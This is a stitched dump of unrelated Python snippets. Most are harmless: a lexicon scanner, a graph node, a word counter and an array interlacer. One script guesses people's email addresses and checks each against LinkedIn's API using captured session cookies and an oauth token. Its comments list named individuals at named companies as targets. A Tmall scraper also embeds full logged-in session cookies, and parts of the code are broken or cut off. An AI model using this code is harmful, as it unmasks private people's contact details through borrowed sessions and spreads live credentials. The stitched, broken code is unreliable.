        :param message: sentence to tokenize
        :return: list of (TYPE, WORD) tuples
        """
        self.words = []
        for word in message.split(" "):
            self.words.append(self.__check_word__(word))
        return self.words
def scan(message):
    """
    Module-level convenience wrapper: classify *message* with a freshly
    constructed lexicon instance.
    :param message:
    :return: list of (TYPE, WORD) tuples
    """
    return lexicon().scan(message=message)
# ----------------------- option 2 with no classes ---------------------------------------------
def isNumber(word):
    """
    Return True when *word* parses as a base-10 integer, False otherwise.
    :param word:
    :return:
    """
    try:
        int(word)
    except ValueError:
        return False
    return True
def getType(word):
    """
    Classify *word* as 'number', 'direction', 'verb', 'stop', 'noun' or
    'error' (unknown) using a lookup table.
    :param word:
    :return: category name as a string
    """
    # numeric tokens win before any keyword lookup
    if isNumber(word):
        return 'number'
    categories = {
        'direction': ['north', 'south', 'east', 'west', 'down', 'up', 'left', 'right', 'back'],
        'verb': ['go', 'stop', 'kill', 'eat'],
        'stop': ['the', 'in', 'of', 'from', 'at', 'it'],
        'noun': ['door', 'bear', 'princess', 'cabinet']
    }
    for category, members in categories.items():
        if word in members:
            return category
    return 'error'
def scan_dictionary_option(message):
    """
    Dictionary-driven variant of scan(): classify every space-separated
    token of *message* via getType(), keeping the token's original case
    in the result.
    :param message:
    :return: list of (type, word) tuples
    """
    return [(getType(token.lower()), token) for token in message.split(' ')]
15,991 | c6df8803e40e95497d46a920b3641fdb074698b5 | from core.node import Node
class Constant(Node):
    """Leaf computation-graph node holding a fixed value.

    NOTE(review): assumes core.node.Node provides the graph plumbing;
    only evaluation, differentiation and printing are specialized here.
    """
    def __init__(self, val):
        super().__init__()
        # the node's fixed value, returned verbatim by perform()
        self.value = val

    def perform(self):
        """Evaluate the node: a constant simply returns its value."""
        return self.value

    def derivative(self, wrt):
        """The derivative of a constant with respect to anything is 0."""
        return 0

    def toString(self):
        """Human-readable form: the value itself."""
        return str(self.value)
15,992 | 51a8c294bb72efce2ea30575c98eaf79d65117fb | bufA = input()
# Count whitespace-separated words in bufA (read from input() above).
# NOTE(review): every internal space increments the count, so consecutive
# internal spaces over-count words -- confirm whether that is intended.
count_word = 1
if bufA == "":  # no input at all: print 0
    print(0)
else:
    for i in bufA:
        if i == " ":  # count the space characters
            count_word += 1
    if bufA[-1] == " ":  # trailing space: no word follows it
        count_word -= 1
    if bufA[0] == " ":  # leading space: no word precedes it
        count_word -= 1
    print(count_word)
|
15,993 | f3b1ccbca2800a8d61659e6e5027088fcde37dcb | /home/jlin246/anaconda3/lib/python3.6/codecs.py |
15,994 | fd3828ae9c68715b3e507d2cc6d0064abc151be8 | import subprocess
curl_auth_URL = '''
curl 'https://www.linkedin.com/uas/js/authuserspace?v=0.0.1191-RC8.56523-1429&api_key=4XZcfCb3djUl-DHJSFYd1l0ULtgSPl9sXXNGbTKT2e003WAeT6c2AqayNTIN5T1s&credentialsCookie=true' -H 'Accept-Encoding: gzip, deflate, sdch, br' -H 'Accept-Language: en-US,en;q=0.8' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.84 Safari/537.36' -H 'Accept: */*' -H 'Referer: https://mail.google.com/mail/u/0/' -H 'Cookie: visit="v=1&M"; wutan=3tuIE4NFg+anLVR45/FRML6KkQZZREJ7voNVKBn5XwM=; bcookie="v=2&5119d04a-4d67-4d0f-8348-ac41c6529628"; bscookie="v=1&20160609204657aaeeccfd-80ab-4d70-80a0-cbb2736bed8eAQHhp-6ERxAp7k5vFJhfyGPoiYlBtxJ4"; _cb_ls=1; _chartbeat2=TZ1XNDgkXfwgrzHC.1465612818216.1466547387325.100101000001; oz_props_fetch_size1_112650289=15; share_setting=PUBLIC; sdsc=1%3A1SZM1shxDNbLt36wZwCgPgvN58iw%3D; _lipt=0_eXhgZe72hwJ1ACrCXPhsS-BdeFMrt54s5y8J_u6z8dzUxuf2h_YiYxmpomBbH-j5GxlEiquAYXl0GjOOBEqM3Bq_3Hi3HdpKqdeiuqMHz5h6CewjOlqYL9Qv3ejiVksrfRO1HnNsQ3vR_o0bKyts22tnnJkCZz7v1wGBmMVZmMpM7qwcXNsxZ3IMdxGqtFCJeNmC4SJGjzpxiWYPVGcE5dHsrhvqegaMtZ2s9dxg7gampby-4WXXuawXOcEJpJPmHD3yihk2-Snwob0GYdK1jMhQwJLxcE7WABN-Z_0z5MVzDSWNj5DScvLw1apCBPghb-ERr7LgtKmUV7ZUYMRhsXXpNcFXKU2FZzvIrRktts-; _ga=GA1.2.785583338.1465937479; lang="v=2&lang=en-us&c="; li_at=AQEDAQa26DEEU7yZAAABVVRR4zoAAAFVeryi4U0Ax6HKjV6DVd1MvPxJGttc4l48nYxa96oVVtytSm9pABwDDEJOk4oCqH_K2w17c5c-HdU5MhWFfLYCu9qcSdzadzddHTk5qru3fNUR6UcWRJDdBKAv; liap=true; sl="v=1&7dzNj"; JSESSIONID="ajax:1898019488492729741"; lidc="b=LB89:g=357:u=181:i=1466637083:t=1466715123:s=AQEs-9w5sEyrnjA_QAFN9SCQxeKHkE5H"' -H 'Connection: keep-alive' --compressed
'''
curl_profile_URL = '''
curl 'https://api.linkedin.com/v1/people/email={0}%40{1}:(first-name,last-name,headline,location,distance,positions,twitter-accounts,im-accounts,phone-numbers,member-url-resources,picture-urls::(original),site-standard-profile-request,public-profile-url,relation-to-viewer:(connections:(person:(first-name,last-name,headline,site-standard-profile-request,picture-urls::(original)))))' -H 'Cookie: bcookie="v=2&5119d04a-4d67-4d0f-8348-ac41c6529628"; sdsc=1%3A1SZM1shxDNbLt36wZwCgPgvN58iw%3D; _lipt=0_eXhgZe72hwJ1ACrCXPhsS-BdeFMrt54s5y8J_u6z8dzUxuf2h_YiYxmpomBbH-j5GxlEiquAYXl0GjOOBEqM3Bq_3Hi3HdpKqdeiuqMHz5h6CewjOlqYL9Qv3ejiVksrfRO1HnNsQ3vR_o0bKyts22tnnJkCZz7v1wGBmMVZmMpM7qwcXNsxZ3IMdxGqtFCJeNmC4SJGjzpxiWYPVGcE5dHsrhvqegaMtZ2s9dxg7gampby-4WXXuawXOcEJpJPmHD3yihk2-Snwob0GYdK1jMhQwJLxcE7WABN-Z_0z5MVzDSWNj5DScvLw1apCBPghb-ERr7LgtKmUV7ZUYMRhsXXpNcFXKU2FZzvIrRktts-; _ga=GA1.2.785583338.1465937479; lang="v=2&lang=en-us&c="; liap=true; lidc="b=LB89:g=357:u=181:i=1466635831:t=1466715123:s=AQH5lo0WCPxkRJs4xxddhuYc__WN3Xh4"' -H 'X-Cross-Domain-Origin: https://mail.google.com' -H 'Accept-Encoding: gzip, deflate, sdch, br' -H 'Accept-Language: en-US,en;q=0.8' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.84 Safari/537.36' -H 'Content-type: application/json' -H 'Accept: */*' -H 'Referer: https://api.linkedin.com/uas/js/xdrpc.html?v=0.0.1191-RC8.56523-1429' -H 'X-Requested-With: IN.XDCall' -H 'x-li-format: json' -H 'Connection: keep-alive' -H 'oauth_token: {2}' -H 'X-HTTP-Method-Override: GET' --compressed
'''
string_formats = '''
{first_name}@{domain}
{last_name}@{domain}
{first_name}{last_name}@{domain}
{first_name}.{last_name}@{domain}
{f_initial}{last_name}@{domain}
{f_initial}.{last_name}@{domain}
{first_name}{l_initial}@{domain}
{first_name}.{l_initial}@{domain}
{f_initial}{l_initial}@{domain}
{f_initial}.{l_initial}@{domain}
{last_name}{first_name}@{domain}
{last_name}.{first_name}@{domain}
{last_name}{f_initial}@{domain}
{last_name}.{f_initial}@{domain}
{l_initial}{first_name}@{domain}
{l_initial}.{first_name}@{domain}
{l_initial}{f_initial}@{domain}
{l_initial}.{f_initial}@{domain}
{f_initial}{last_name}@{domain}
{f_initial}.{last_name}@{domain}
{first_name}{last_name}@{domain}
{first_name}..{last_name}@{domain}
{first_name}{last_name}@{domain}
{first_name}..{last_name}@{domain}
{first_name}-{last_name}@{domain}
{f_initial}-{last_name}@{domain}
{first_name}-{l_initial}@{domain}
{f_initial}-{l_initial}@{domain}
{last_name}-{first_name}@{domain}
{last_name}-{f_initial}@{domain}
{l_initial}-{first_name}@{domain}
{l_initial}-{f_initial}@{domain}
{f_initial}-{last_name}@{domain}
{first_name}--{last_name}@{domain}
{first_name}--{last_name}@{domain}
{first_name}_{last_name}@{domain}
{f_initial}_{last_name}@{domain}
{first_name}_{l_initial}@{domain}
{f_initial}_{l_initial}@{domain}
{last_name}_{first_name}@{domain}
{last_name}_{f_initial}@{domain}
{l_initial}_{first_name}@{domain}
{l_initial}_{f_initial}@{domain}
{f_initial}_{last_name}@{domain}
{first_name}__{last_name}@{domain}
{first_name}__{last_name}@{domain}
'''
def curl_this(url):
    '''
    Run a full shell command string (a `curl ...` invocation) and return
    its (stdout, stderr) pair from communicate().

    I: string, prepended by 'curl'
    O: output string of curl

    NOTE(review): shell=True executes the string through the shell -- only
    safe because the command templates above are hard-coded; never pass
    user-controlled strings here.
    '''
    stor = subprocess.Popen(
        url,
        shell=True,
        stdout=subprocess.PIPE,
        stderr=subprocess.PIPE
    ).communicate()
    return stor
def parse_auth_token(curled_output):
#build regex or something to parse this
if curled_output[0] != '':
cut_off_front = curled_output[0].split('l.oauth_token =')[1]
cut_off_back = cut_off_front.split(';')[0]
auth_token_str = cut_off_back.strip().strip('\"')
else:
print output[1]
return None
return auth_token_str
def get_auth_token(URL):
    """Fetch the auth page with curl and return the parsed oauth token (or None)."""
    return parse_auth_token(curl_this(URL))
def get_profile_from_LI(user_handle, domain, auth_token):
    """Query the LinkedIn people API for user_handle@domain.

    Returns curl's (stdout, stderr) pair for the formatted profile request.
    """
    profile = curl_this(curl_profile_URL.format(user_handle, domain, auth_token))
    return profile
def check_LI_profile_exist(user_handle, domain, auth_token):
    """Return True when LinkedIn reports a profile for user_handle@domain.

    Works by string-matching the raw JSON response ("hacky ass way", as
    the original author noted): no "errorCode" at all means the profile
    exists; errorCode 0 means the oauth token expired.
    """
    # hacky ass way to this
    output_str = get_profile_from_LI(user_handle, domain, auth_token)
    some_output_string = output_str[0]
    # bug fix: the original `raise exception(...)` was a NameError --
    # the builtin is `Exception`.  Fail loudly so the caller can fetch
    # a fresh token.
    if '''"errorCode": 0,''' in some_output_string:
        raise Exception('auth error')
    return ('''"errorCode"''' not in some_output_string)
# I, O: first name, last name, domain
def permuter(first_name, last_name, domain):
    """Expand the module-level string_formats template into every candidate
    email address for the person.

    Returns the list of formatted addresses; [1:-1] slices off the empty
    entries produced by the template's leading/trailing newlines.
    """
    disc = {
        'first_name': first_name,
        'last_name': last_name,
        'f_initial': first_name[0],
        'l_initial': last_name[0],
        'domain': domain,
    }
    emails = [template.format(**disc).strip() for template in string_formats.split('\n')]
    return emails[1:-1]
def email_checker(first_name, last_name, domain):
    """Probe LinkedIn for every permuted candidate email address.

    Returns [(email, exists_bool), ...].  One sequential curl per
    candidate, so this is slow -- as the original comment notes.
    """
    # it's not very fast so lets multithread
    auth_token = get_auth_token(curl_auth_URL)
    # print auth_token
    #auth_token = "CwvLIj55Ne3EZw9HTE6SX7fKv2g5mnfdYnnL"
    list_of_emails = permuter(first_name, last_name, domain)
    output = []
    for email in list_of_emails:
        user_handle, domain = email.split('@')
        boolean = check_LI_profile_exist(user_handle, domain, auth_token)
        output.append((email, boolean))
    return output
if __name__ == '__main__':
# ('joe','choti', 'mlb.com'),
# ('laura', 'kang', 'sendence.com'),
# ('rasmus', "wissmann", 'oscarhealth.com'),
# ('paolo', 'esquivel', 'truveris.com'),
# ('carl', 'anderson', 'wework.com'),
# ('carl', 'vogel', 'warbyparker.com'),
# ('max', 'shron', 'warbyparker.com'),
# some_list = [
# ('Debbie', 'Chung', 'gilt.com'),
# ('Igor', 'Elbert', 'gilt.com'),
# ('asharma','567567', 'gmail.com'),
# ('claudia', 'perlich', 'dstillery.com'),
# ('brian', 'dalessandro', 'zocdoc.com'),
# ('jeffrey', 'picard', 'contently.com'),
# ]
# str_lis = '''
# Eric Xu Outbrain.com
# Samer Zaben Vimeo.com
# Steve Wood Squarespace.com
# Brad Willard Squarespace.com
# David Llanos Gallup.com
# Anuradha Uduwage Gallup.com
# Peter Edwards Zillow.com
# John Wiley Zillow.com
# Shawn LeMone ASCAP.com
# Mark Katz ASCAP.com
# Sarah Bloomquist ASCAP.com
# David Frigeri ASCAP.com
# Alex Kass digitalocean.com
# Courtney Epstein zocdoc.com
# brian dalessandro zocdoc.com
# Dan Becker datarobot.com
# Satadru Sengupta datarobot.com
# xavier datarobot.com
# Srikesh Arunajadai Celmatix.com
# Bob Sohval securityscorecard.io
# ppoh securityscorecard.io
# Richard Williams makerbot.com
# Russell Kummer makerbot.com
# Alexandra Marvar makerbot.com
# Jack Thompson makerbot.com
# Jonathan Taqqu intentmedia.com
# careers sendence.com
# Laura sendence.com
# '''
'''
brian@zocdoc.com
EXu@Outbrain.com
'''
str_lis = '''
a sharma567567 gmail.com
max shron warbyparker.com
'''
some_list = [tuple(item.strip('\t').split()) for item in str_lis.split('\n') if item != '']
for args in some_list:
try:
filtered_for_positives = [email for email in email_checker(*args) if email[1]]
if filtered_for_positives:
print '\n'.join(map(str,filtered_for_positives[::-1]))
else:
print None
except:
print args |
15,995 | 77ef4bda8fa7b0148a30d51267800e0978d06b4f | import torch
import numpy as np
def Interlace(inp, intermediate, scale):
    """Interleave the rows of `intermediate` between the rows of `inp`.

    Row i of `inp` lands at output row i*scale, with the corresponding
    (scale-1) rows of `intermediate` filling each gap; the last row of
    `inp` closes the output.

    NOTE(review): assumes inp is (N, C) and intermediate is
    ((N-1)*(scale-1), C) -- confirm with callers.  Returns 0 after
    printing a message when the column counts disagree (original
    behavior, kept for compatibility).
    """
    if inp.shape[1] != intermediate.shape[1]:
        print('Wrong Dimensions')
        return 0
    n_rows = inp.shape[0] + intermediate.shape[0]
    # bug fix: the original tested repr(type(inp[8:8+5])) == 'torch', which
    # is never true (repr of a type looks like "<class 'torch.Tensor'>"),
    # so torch inputs silently produced numpy output
    if torch.is_tensor(inp):
        output = torch.Tensor(n_rows, inp.shape[1])
    else:
        output = np.zeros((n_rows, inp.shape[1]))
    for i in range(0, inp.shape[0] - 1):
        output[int(i * scale), :] = inp[i, :]
        output[int(i * scale + 1):int((i + 1) * scale), :] = \
            intermediate[int(i * (scale - 1)):int((i + 1) * (scale - 1)), :]
    output[-1, :] = inp[-1, :]
    return output
|
15,996 | a3c3a2163f30f3cea8400c359b8a679c0a7463ec | import random
import re
import time
import requests
from lxml import etree
from selenium import webdriver
headers = {
"accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8",
"accept-encoding": "gzip, deflate, br",
"accept-language": "zh-CN,zh;q=0.9",
"cache-control": "max-age=0",
"cookie": "cna=gY5E8vPMGACASvgLWesBpgg; _med=dw:1440&dh:900&pw:1440&ph:900&ist:0; l=bBgQUK1lvHlc2bE_BOCg5uI81fb9kIRPguPRwGoei_5Q-1T-JB_OlkIbwe96Vj5P9bYB4R3ZAF9teFmT8PsV.; sm4=110100; enc=xzqpgSiaHaMOi%2BHzY%2BcQ8xIJ6jeSOrGpaJQ3yJ2MJm22hbDyWWnk1saajEjzUU5PAmCn0Kvw4fr%2FIX%2F6FkAhoA%3D%3D; _uab_collina=155187561517221955690883; lid=%E6%8F%90%E6%96%AF%E6%8B%89%E7%88%B8%E7%88%B8; tk_trace=1; t=a3e60ff03b942db42bf59b62b90443e5; _tb_token_=31be3e73997e5; cookie2=1b8f21a5c9e506e84e656d60295a13a5; cq=ccp%3D0; _m_h5_tk=2b2e6ca1faf3b9ef51840702c02623a2_1552193233241; _m_h5_tk_enc=14e720156a77f0f3f7de9aebce6942d4; hng=""; uc1=cookie21=V32FPkk%2FhSg%2F&cookie15=V32FPkk%2Fw0dUvg%3D%3D&cookie14=UoTZ5iTH1XrsOA%3D%3D; uc3=vt3=F8dByEvz0Szpp1DisBo%3D&id2=UUphyu7opSokkbNd8Q%3D%3D&nk2=r7Qc2M7TAvy3RA%3D%3D&lg2=URm48syIIVrSKA%3D%3D; tracknick=%5Cu63D0%5Cu65AF%5Cu62C9%5Cu7238%5Cu7238; _l_g_=Ug%3D%3D; ck1=""; unb=2200733418885; lgc=%5Cu63D0%5Cu65AF%5Cu62C9%5Cu7238%5Cu7238; cookie1=W80vOuO9AY8m2yPvjGw2CQE%2B%2Bjh7a7z5PnzPvOgtEs0%3D; login=true; cookie17=UUphyu7opSokkbNd8Q%3D%3D; _nk_=%5Cu63D0%5Cu65AF%5Cu62C9%5Cu7238%5Cu7238; uss=""; csg=43d8c04e; skt=5b8c3cc2a083a8a4; tt=tmall-main; res=scroll%3A1440*5485-client%3A1440*789-offset%3A1440*5485-screen%3A1440*900; pnm_cku822=098%23E1hvH9vUvbpvjQCkvvvvvjiPRLqhtjrbRLqpQjEUPmPysjYWP2chAjlURFM96j9Pvpvhvv2MMQyCvh1hNx9vITtGVB%2Bkaf90%2BktEnHsG1CywJhHTpYLZV1O07oDn9Wma%2BoHoEpchQC6tExhlBqev%2BulgEc6OfwkXdeQEVADlYbVrwZyaWXxrKphv8hCvvvvvvhCvphvZ99vvplXvpComvvC216CvHUUvvhn9phvZ99vvpGJivpvUphvhifEJ0R4EvpvVpyUU2E%2BXvphvCyCCvvvvv2yCvvBvpvvviQhvChCvCCp%3D; isg=BLq61pFZsrFqODnGWWrCECoAC-ZwfzRHEENi48SzI80Yt1rxrPmfVEvFAwPOJ7bd",
"referer": "https://list.tmall.com/search_product.htm?q=iiphone&type=p&vmarket=&spm=875.7931836%2FB.a2227oh.d100&from=mallfp..pc_1_searchbutton",
"upgrade-insecure-requests": "1",
"user-agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36",
}
# url = 'https://list.tmall.com/search_product.htm?q=三星+x&type=p&spm=a220m.1000858.a2227oh.d100&from=.list.pc_1_searchbutton'
# url = 'https://list.tmall.com/search_product.htm?spm=a220m.1000858.0.0.4f585cb2WFk5MD&brand=30111&s=60&q=iphone+x&sort=s&style=g&from=.list.pc_1_searchbutton&smAreaId=110100&type=pc#J_Filter'
def first_page(url):
    """Scrape one Tmall search-result page and feed every product record
    to detaail_page().

    Each product yields a dict with price, detail url, product id/name,
    shop name, monthly sales and review count/link.  The literal '空'
    ("empty") marks a missing optional field, as downstream code expects.
    """
    r = requests.get(url=url, headers=headers)
    tree = etree.HTML(r.text)
    div = tree.xpath('//div[@class="product-iWrap"]')
    for li in div:
        item = {}
        # price
        price = li.xpath('./p/em/@title')[0]
        # detail page link
        detail_href = 'http:' + li.xpath('./div/a/@href')[0]
        # product id: first run of digits in the detail href
        product_id_detail = li.xpath('./div/a/@href')[0]
        product_id = re.findall(r'\d+', product_id_detail)[0]
        # product name
        product_name = li.xpath('./p/a/@title')[0]
        # shop name
        shop_name = str(li.xpath('./div[@class="productShop"]/a/text()')[0]).strip('\n')
        # monthly sales (optional field)
        try:
            mon_sales = str(li.xpath('./p[@class="productStatus"]/span/em/text()')[0]).strip('\n')
        except Exception:
            mon_sales = '空'
        # review count (optional field)
        try:
            comment_count = str(li.xpath('./p[@class="productStatus"]/span[2]/a/text()')[0])
        except Exception:
            comment_count = '空'
        # review page link (optional field)
        try:
            comment_href = 'http:' + str(li.xpath('./p[@class="productStatus"]/span[2]/a/@href')[0])
        except Exception:
            comment_href = '空'
        item['price'] = price
        item['detail'] = detail_href
        # bug fix: product_name was written to item['shop_name'] and then
        # immediately overwritten by shop_name, so the name was lost
        item['product_name'] = product_name
        item['shop_name'] = shop_name
        item['mon_sales'] = mon_sales
        item['comment_count'] = comment_count
        item['comment_href'] = comment_href
        item['product_id'] = product_id
        detaail_page(item)
# # mUA = 'User-Agent, Mozilla/5.0 (Linux; U; Android 2.3.7; en-us; Nexus One Build/FRF91) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1'
# mUA ="user-agent", "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36",
# mWidth = 520
# mHeight = 20431
# PIXEL_RATIO = 3.0
#
# mobileEmulation = {"deviceMetrics": {"width": mWidth, "height": mHeight, "pixelRatio": PIXEL_RATIO},
# "userAgent": mUA}
#
#
# def create_chrome():
# ops = webdriver.ChromeOptions()
# ops.add_experimental_option('mobileEmulation', mobileEmulation)
# # ops.add_argument('--headless')
# # ops.add_argument('--disable-gpu')
#
# web = webdriver.Chrome(chrome_options=ops)
# web.set_page_load_timeout(10)
# web.set_script_timeout(10)
# web.set_window_size(mWidth, mHeight)
# return web
#
#
# driver = create_chrome()
from selenium.webdriver.chrome.options import Options
def get_chrome():
    """Return a selenium Chrome driver with default options.

    The headless/GPU flags are deliberately left commented out -- Tmall's
    anti-bot checks apparently made headless mode unusable here.
    """
    chrome_options = Options()
    # chrome_options.add_argument('--headless')
    # chrome_options.add_argument('--disable-gpu')
    return webdriver.Chrome(chrome_options=chrome_options)
def detaail_page(item):
headers = {
"accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8",
"accept-encoding": "gzip, deflate, br",
"accept-language": "zh-CN,zh;q=0.9",
"cache-control": "max-age=0",
"cookie": "cna=gY5GE8vPMGACASvgLWesBpgg; l=bBgQUK1lvHlc2bE_BOCg5uI81fb9kIRPguPRwGoei_5Q-1T-JB_OlkIbwe96Vj5P9bYB4R3ZAF9teFmT8PsV.; sm4=110100; enc=xzqpgSiaHaMOi%2BHzY%2BcQ8xIJ6jeSOrGpaJQ3yJ2MJm22hbDyWWnk1saajEjzUU5PAmCn0Kvw4fr%2FIX%2F6FkAhoA%3D%3D; lid=%E6%8F%90%E6%96%AF%E6%8B%89%E7%88%B8%E7%88%B8; uss=""; _m_h5_tk=1c56b3d37cd4403e000ffc74cbf0e4c9_1552207508287; _m_h5_tk_enc=b596a3c994e77edd8777cd0bdb03dc57; hng=CN%7Czh-CN%7CCNY%7C156; t=a3e60ff03b942db42bf59b62b90443e5; tracknick=%5Cu63D0%5Cu65AF%5Cu62C9%5Cu7238%5Cu7238; lgc=%5Cu63D0%5Cu65AF%5Cu62C9%5Cu7238%5Cu7238; _tb_token_=ff5667554a5e5; cookie2=1773b3ac32e4331c11fb93ca5d48c43d; uc1=cookie16=UIHiLt3xCS3yM2h4eKHS9lpEOw%3D%3D&cookie21=VT5L2FSpdiBh&cookie15=UtASsssmOIJ0bQ%3D%3D&existShop=false&pas=0&cookie14=UoTZ5icOEeoPwA%3D%3D&tag=8&lng=zh_CN; uc3=vt3=F8dByEvz36PVYahQBiM%3D&id2=UUphyu7opSokkbNd8Q%3D%3D&nk2=r7Qc2M7TAvy3RA%3D%3D&lg2=U%2BGCWk%2F75gdr5Q%3D%3D; _l_g_=Ug%3D%3D; ck1=""; unb=2200733418885; cookie1=W80vOuO9AY8m2yPvjGw2CQE%2B%2Bjh7a7z5PnzPvOgtEs0%3D; login=true; cookie17=UUphyu7opSokkbNd8Q%3D%3D; _nk_=%5Cu63D0%5Cu65AF%5Cu62C9%5Cu7238%5Cu7238; csg=f8aceb36; skt=e95849fa038db48d; cq=ccp%3D0; pnm_cku822=098%23E1hvIvvUvbpvUpCkvvvvvjiPRLqUQjDvPFLhljrCPmPW6jDWP2cpgjYWRLFyQjnvRuwCvvpvvUmmkphvC99vvOHzB4yCvv9vvUm6EuavcbyCvm9vvvvvphvvvvvv9DCvpv1ZvvmmZhCv2CUvvUEpphvWDvvv9DCvpvQomphvLvs599vj7SLXS4ZAhjCwD7zOaXTAVA1l%2BExreTtYcgkQD70wd56JfaBl%2Bb8rwZHlYneYr2E9ZbmxfwoOd5ln%2B8c61EyXJZ%2FQ0f0DW3vCvpvVvvpvvhCv2QhvCvvvMMGtvpvhvvvvvv%3D%3D; isg=BKKiFjT8Cnk00xE-seKqKJII8y6o56wP-FtKO-w7z5XEv0M51IL_HV0t67vmrx6l",
"referer": "https://list.tmall.com/search_product.htm?q=iiphone+x&type=p&spm=a220m.1000858.a2227oh.d100&from=.list.pc_1_searchbutton",
"upgrade-insecure-requests": "1",
"user-agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36",
}
# print(item)
print(item['comment_href'])
# driver.get()
if item['comment_href'] != '空':
# r = requests.get(url=url, headers=headers)
# # time.sleep(5)
# # print(r.text)
# tree = etree.HTML(r.text)
# 'class="rate-grid"'
# tr_list = tree.xpath('//div[@class="rate-grid"]/table/tbody/tr')
# # print(len(tr_list))
# splash_render(item['comment_href'])
dirver_get_page(item['comment_href'])
# chrome 不好使
# driver = get_chrome()
# driver.get(item['comment_href'])
# time.sleep(30)
# print(driver.page_source)
def splash_render(url):
    """Render *url* through a local Splash instance and print the resulting HTML.

    Splash (listening on localhost:8050) executes the page's JavaScript
    server-side, which plain ``requests`` cannot do for Tmall's dynamic pages.
    NOTE(review): this prints the HTML instead of returning it — the
    ``return response.text`` line is commented out; confirm callers only
    want the side effect.

    :param url: page URL to render
    """
    # Splash HTTP render endpoint.
    splash_url = "http://localhost:8050/render.html"
    args = {
        "url": url,
        "timeout": 5,  # seconds Splash waits for the page to render
        "image": 0     # skip image downloads to speed rendering up
    }
    # Browser-like headers plus a captured logged-in Tmall session cookie;
    # without the cookie Tmall serves a login/anti-bot page instead.
    # NOTE(review): the embedded "" inside the cookie value (uss="" / ck1="")
    # splits the Python string literal via implicit concatenation, so those
    # cookie values are sent without their quotes — confirm this is intended.
    headers = {
        "accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8",
        "accept-encoding": "gzip, deflate, br",
        "accept-language": "zh-CN,zh;q=0.9",
        "cache-control": "max-age=0",
        "cookie": "cna=gY5GE8vPMGACASvgLWesBpgg; l=bBgQUK1lvHlc2bE_BOCg5uI81fb9kIRPguPRwGoei_5Q-1T-JB_OlkIbwe96Vj5P9bYB4R3ZAF9teFmT8PsV.; sm4=110100; enc=xzqpgSiaHaMOi%2BHzY%2BcQ8xIJ6jeSOrGpaJQ3yJ2MJm22hbDyWWnk1saajEjzUU5PAmCn0Kvw4fr%2FIX%2F6FkAhoA%3D%3D; lid=%E6%8F%90%E6%96%AF%E6%8B%89%E7%88%B8%E7%88%B8; uss=""; _m_h5_tk=1c56b3d37cd4403e000ffc74cbf0e4c9_1552207508287; _m_h5_tk_enc=b596a3c994e77edd8777cd0bdb03dc57; hng=CN%7Czh-CN%7CCNY%7C156; t=a3e60ff03b942db42bf59b62b90443e5; tracknick=%5Cu63D0%5Cu65AF%5Cu62C9%5Cu7238%5Cu7238; lgc=%5Cu63D0%5Cu65AF%5Cu62C9%5Cu7238%5Cu7238; _tb_token_=ff5667554a5e5; cookie2=1773b3ac32e4331c11fb93ca5d48c43d; uc1=cookie16=UIHiLt3xCS3yM2h4eKHS9lpEOw%3D%3D&cookie21=VT5L2FSpdiBh&cookie15=UtASsssmOIJ0bQ%3D%3D&existShop=false&pas=0&cookie14=UoTZ5icOEeoPwA%3D%3D&tag=8&lng=zh_CN; uc3=vt3=F8dByEvz36PVYahQBiM%3D&id2=UUphyu7opSokkbNd8Q%3D%3D&nk2=r7Qc2M7TAvy3RA%3D%3D&lg2=U%2BGCWk%2F75gdr5Q%3D%3D; _l_g_=Ug%3D%3D; ck1=""; unb=2200733418885; cookie1=W80vOuO9AY8m2yPvjGw2CQE%2B%2Bjh7a7z5PnzPvOgtEs0%3D; login=true; cookie17=UUphyu7opSokkbNd8Q%3D%3D; _nk_=%5Cu63D0%5Cu65AF%5Cu62C9%5Cu7238%5Cu7238; csg=f8aceb36; skt=e95849fa038db48d; cq=ccp%3D0; pnm_cku822=098%23E1hvIvvUvbpvUpCkvvvvvjiPRLqUQjDvPFLhljrCPmPW6jDWP2cpgjYWRLFyQjnvRuwCvvpvvUmmkphvC99vvOHzB4yCvv9vvUm6EuavcbyCvm9vvvvvphvvvvvv9DCvpv1ZvvmmZhCv2CUvvUEpphvWDvvv9DCvpvQomphvLvs599vj7SLXS4ZAhjCwD7zOaXTAVA1l%2BExreTtYcgkQD70wd56JfaBl%2Bb8rwZHlYneYr2E9ZbmxfwoOd5ln%2B8c61EyXJZ%2FQ0f0DW3vCvpvVvvpvvhCv2QhvCvvvMMGtvpvhvvvvvv%3D%3D; isg=BKKiFjT8Cnk00xE-seKqKJII8y6o56wP-FtKO-w7z5XEv0M51IL_HV0t67vmrx6l",
        "referer": "https://list.tmall.com/search_product.htm?q=iiphone+x&type=p&spm=a220m.1000858.a2227oh.d100&from=.list.pc_1_searchbutton",
        "upgrade-insecure-requests": "1",
        "user-agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36",
    }
    response = requests.get(splash_url, params=args, headers=headers)
    # return response.text
    print(response.text)
# User-agent strings rotated per session to look less bot-like.
pcUA = ['Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50',
        'Mozilla/5.0 (iPad; U; CPU OS 4_3_3 like Mac OS X; en-us) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8J2 Safari/6533.18.5']
# Emulated viewport dimensions for Chrome's mobile-emulation mode.
mWidth = 1440
mHeight = 2000
PIXEL_RATIO = 3.0
# ChromeDriver "mobileEmulation" capability. Bug fix: the user-agent key must
